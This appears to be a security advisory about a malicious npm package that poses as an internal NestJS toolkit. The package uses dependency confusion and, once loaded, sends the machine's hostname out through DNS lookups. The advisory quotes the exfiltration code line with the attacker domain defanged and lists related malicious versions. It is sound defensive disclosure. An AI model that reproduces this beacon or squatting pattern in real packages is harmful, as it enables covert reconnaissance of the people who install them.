@galicia-toolkit-nestjs/commons@999.0.1
Malicious code in @galicia-toolkit-nestjs/commons (npm)
Analysis
@galicia-toolkit-nestjs/commons@999.0.1 is a dependency-confusion / version-squat stub: it publishes a sentinel version (999.0.1) under a scoped name that mimics an internal NestJS toolkit, but ships only a 419-byte index.js. The module exports three no-op NestJS-shaped helpers (version, forRoot, createLogger) as camouflage, then schedules a 5-second timer that reads the victim's hostname via os.hostname() and resolves it as a DNS label under the attacker-controlled domain, i.e. require('dns').resolve(hostname + '.c999[.]dc[.]oob[.]s4yhii[.]com'). This is an out-of-band collection channel: the machine's hostname is exfiltrated in the DNS query itself, with the 'c999' label acting as a campaign/target correlation id, allowing the operator to enumerate which hosts installed the package. The package contains no legitimate functionality, no dependencies, and no lifecycle hooks; the beacon runs whenever the module is required. No credential, token, or file theft was observed — the payload is limited to hostname exfiltration over DNS.
- analyzed by
- Leitwacht
- first seen
- Oct 9, 2026, 08:30 AM
- analyzed
- Oct 9, 2026, 08:31 AM
Related advisories
- @galicia-toolkit-nestjs/paas@999.0.3
- @galicia-toolkit-nestjs/archetype@999.0.1
- @galicia-toolkit/spa-build-config@999.0.6
- @galicia-toolkit/tag-manager@999.0.6
- @galicia-toolkit/spa-build-config@999.0.5
- @galicia-toolkit/tag-manager@999.0.5
- @galicia-toolkit/tag-manager@999.0.3
- @nf-addons/am-global-header@9.9.10
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.